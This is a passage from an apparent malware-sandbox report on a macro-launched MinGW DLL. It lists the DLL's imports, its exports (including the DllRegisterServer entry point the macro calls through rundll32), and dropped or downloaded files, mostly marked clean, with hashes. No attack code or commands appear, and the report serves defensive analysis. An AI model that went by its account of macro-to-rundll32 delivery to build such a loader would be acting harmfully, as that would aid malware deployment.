LoadLibraryA - 0x6ab46268 0x460dc 0x424dc 0x329
QueryPerformanceCounter - 0x6ab4626c 0x460e0 0x424e0 0x393
ReleaseMutex - 0x6ab46270 0x460e4 0x424e4 0x3be
ReleaseSemaphore - 0x6ab46274 0x460e8 0x424e8 0x3c2
ResetEvent - 0x6ab46278 0x460ec 0x424ec 0x3d3
ResumeThread - 0x6ab4627c 0x460f0 0x424f0 0x3d6
SetEvent - 0x6ab46280 0x460f4 0x424f4 0x41d
SetLastError - 0x6ab46284 0x460f8 0x424f8 0x436
SetProcessAffinityMask - 0x6ab46288 0x460fc 0x424fc 0x441
SetThreadContext - 0x6ab4628c 0x46100 0x42500 0x455
SetThreadPriority - 0x6ab46290 0x46104 0x42504 0x45d
SetUnhandledExceptionFilter - 0x6ab46294 0x46108 0x42508 0x467
Sleep - 0x6ab46298 0x4610c 0x4250c 0x474
SuspendThread - 0x6ab4629c 0x46110 0x42510 0x47c
TerminateProcess - 0x6ab462a0 0x46114 0x42514 0x482
TlsAlloc - 0x6ab462a4 0x46118 0x42518 0x487
TlsGetValue - 0x6ab462a8 0x4611c 0x4251c 0x489
TlsSetValue - 0x6ab462ac 0x46120 0x42520 0x48a
TryEnterCriticalSection - 0x6ab462b0 0x46124 0x42524 0x491
UnhandledExceptionFilter - 0x6ab462b4 0x46128 0x42528 0x496
VirtualAlloc - 0x6ab462b8 0x4612c 0x4252c 0x4ad
VirtualFree - 0x6ab462bc 0x46130 0x42530 0x4b2
VirtualProtect - 0x6ab462c0 0x46134 0x42534 0x4b6
VirtualQuery - 0x6ab462c4 0x46138 0x42538 0x4b9
WaitForMultipleObjects - 0x6ab462c8 0x4613c 0x4253c 0x4c0
WaitForSingleObject - 0x6ab462cc 0x46140 0x42540 0x4c2
msvcrt.dll (34)
API Name Ordinal IAT Address Thunk RVA Thunk Offset Hint
__dllonexit - 0x6ab462d4 0x46148 0x42548 0x37
_amsg_exit - 0x6ab462d8 0x4614c 0x4254c 0x90
_beginthreadex - 0x6ab462dc 0x46150 0x42550 0x9d
_endthreadex - 0x6ab462e0 0x46154 0x42554 0xda
_ftime - 0x6ab462e4 0x46158 0x42558 0x124
_initterm - 0x6ab462e8 0x4615c 0x4255c 0x15d
_iob - 0x6ab462ec 0x46160 0x42560 0x161
_lock - 0x6ab462f0 0x46164 0x42564 0x1ca
_onexit - 0x6ab462f4 0x46168 0x42568 0x271
_setjmp3 - 0x6ab462f8 0x4616c 0x4256c 0x2b0
_unlock - 0x6ab462fc 0x46170 0x42570 0x346
_write - 0x6ab46300 0x46174 0x42574 0x3ef
abort - 0x6ab46304 0x46178 0x42578 0x41e
atoi - 0x6ab46308 0x4617c 0x4257c 0x427
calloc - 0x6ab4630c 0x46180 0x42580 0x42b
exit - 0x6ab46310 0x46184 0x42584 0x436
fprintf - 0x6ab46314 0x46188 0x42588 0x446
fputc - 0x6ab46318 0x4618c 0x4258c 0x448
fputs - 0x6ab4631c 0x46190 0x42590 0x449
free - 0x6ab46320 0x46194 0x42594 0x44d
fwrite - 0x6ab46324 0x46198 0x42598 0x458
longjmp - 0x6ab46328 0x4619c 0x4259c 0x486
malloc - 0x6ab4632c 0x461a0 0x425a0 0x487
memcmp - 0x6ab46330 0x461a4 0x425a4 0x48e
memcpy - 0x6ab46334 0x461a8 0x425a8 0x48f
memmove - 0x6ab46338 0x461ac 0x425ac 0x490
memset - 0x6ab4633c 0x461b0 0x425b0 0x492
printf - 0x6ab46340 0x461b4 0x425b4 0x497
realloc - 0x6ab46344 0x461b8 0x425b8 0x4a2
sprintf - 0x6ab46348 0x461bc 0x425bc 0x4ae
strcmp - 0x6ab4634c 0x461c0 0x425c0 0x4b7
strlen - 0x6ab46350 0x461c4 0x425c4 0x4bf
strncmp - 0x6ab46354 0x461c8 0x425c8 0x4c2
vfprintf - 0x6ab46358 0x461cc 0x425cc 0x4e3
USER32.dll (1)
API Name Ordinal IAT Address Thunk RVA Thunk Offset Hint
MessageBoxA - 0x6ab46360 0x461d4 0x425d4 0x1b6
Exports (9)
Api name EAT Address Ordinal Demangled
DllRegisterServer 0x44a8 0x1 (C export; the entry point the macro's rundll32 command line calls)
_ZN8DllClass10HelloWorldEv 0x1520 0x2 DllClass::HelloWorld()
_ZN8DllClassC1Ev 0x14c4 0x3 DllClass::DllClass() (complete-object constructor)
_ZN8DllClassC2Ev 0x14c4 0x4 DllClass::DllClass() (base-object constructor)
_ZN8DllClassD0Ev 0x1500 0x5 DllClass::~DllClass() (deleting destructor)
_ZN8DllClassD1Ev 0x14d8 0x6 DllClass::~DllClass() (complete-object destructor)
_ZN8DllClassD2Ev 0x14d8 0x7 DllClass::~DllClass() (base-object destructor)
_ZTI8DllClass 0x42f9c 0x8 typeinfo for DllClass
_ZTV8DllClass 0x431b8 0x9 vtable for DllClass
The name mangling follows the Itanium C++ ABI, so the DLL was built with GCC/MinGW rather than MSVC, which also fits the msvcrt.dll imports (_setjmp3, __dllonexit, _amsg_exit) and the /N section names above. A DllClass with a HelloWorld() method is the skeleton a Code::Blocks-style MinGW DLL project template generates; it was left in place next to the DllRegisterServer export the macro invokes.
c:\users\keecfmwgj\appdata\roaming\microsoft\excel\dceab100 Dropped File Unknown
clean
MIME Type -
File Size 0 Bytes (the hashes below are those of empty input)
MD5 d41d8cd98f00b204e9800998ecf8427e
SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SSDeep 3::
ImpHash -
authroot.stl Embedded File Stream
clean
Known to be clean. This is the Windows certificate trust list fetched by the operating system's automatic root-certificate update (the CAB below), a routine background download of the guest rather than something the sample carries.
Also Known As c:\users\keecfmwgj\appdata\local\temp\tar374f.tmp (Dropped File)
Parent File -
MIME Type application/octet-stream
File Size 157.81 KB
MD5 d99661d0893a52a0700b8ae68457351a
SHA1 01491fd23c4813a602d48988531ea4abbcdf7ed9
SHA256 bdd5111162a6fa25682e18fa74e37e676d49cafcb5b7207e98e5256d1ef0d003
SSDeep 1536:FlYXleUpAR73k/99oFr+yQNujWNWv+1w/A/rHeGyjYPjCQarsmt6Q/GM:F+X7ARcqhQNujZv+mQjCjrsSP
ImpHash -
c:\users\keecfmwgj\appdata\local\temp\~df0e8bec461e0e10fe.tmp Dropped File Stream
clean
Known to be clean.
MIME Type application/octet-stream
File Size 512 Bytes (the hashes below are those of 512 zero bytes)
MD5 bf619eac0cdf3f68d496ea9344137e8b
SHA1 5c3eb80066420002bc3dcc7ca4ab6efad7ed4ae5
SHA256 076a27c79e5ace2a3d47f9dd2e83e4ff6ea8872b3c2218f66c92b89b55f36560
SSDeep 3::
ImpHash -
c:\users\keecfmwgj\appdata\local\temp\cab374e.tmp Downloaded File CAB
clean
Parent File analysis.pcap
MIME Type application/vnd.ms-cab-compressed
File Size 59.97 KB
MD5 acaeda60c79c6bcac925eeb3653f45e0
SHA1 2aaae490bcdaccc6172240ff1697753b37ac5578
SHA256 6b0ceccf0103afd89844761417c1d23acc41f8aebf3b7230765209b61eee5658
SSDeep 1536:EysgU6qmzixT64jYMZ8HbVPGfVDwm/xLZ9rP:wF6qmeo4eH1m9wmLvrP
ImpHash -
Archive Information
Number of Files 1
Number of Folders 0
Size of Packed Archive Contents 157.81 KB
Size of Unpacked Archive Contents 157.81 KB
File Format cab
Contents (1)
File Name Packed Size Unpacked Size Compression Is Encrypted Modify Time Severity
authroot.stl 157.81 KB 157.81 KB MSZip False 2021-10-18 15:18 (UTC+2) Clean
0.png Embedded File Image
clean
Parent File c:\users\keecfmwgj\desktop\15eab100
MIME Type image/png
File Size 74.02 KB
MD5 c6fce278e0ef97fccb5eefb70ff6e7e8
SHA1 6ae93ce6423830509145e74b1d4a579c86e6dcb9
SHA256 b3d17ce1ecb565498388bb5c5b19d5011a8b9034f00bd18944f01edce91049b9
SSDeep 1536:InyV+ns1BVi/IEh2hx0Lx3bKhllGGx0vKCEjdQjqEk+xXO:IyVEoBo6hKb4llGsQjbxe
ImpHash -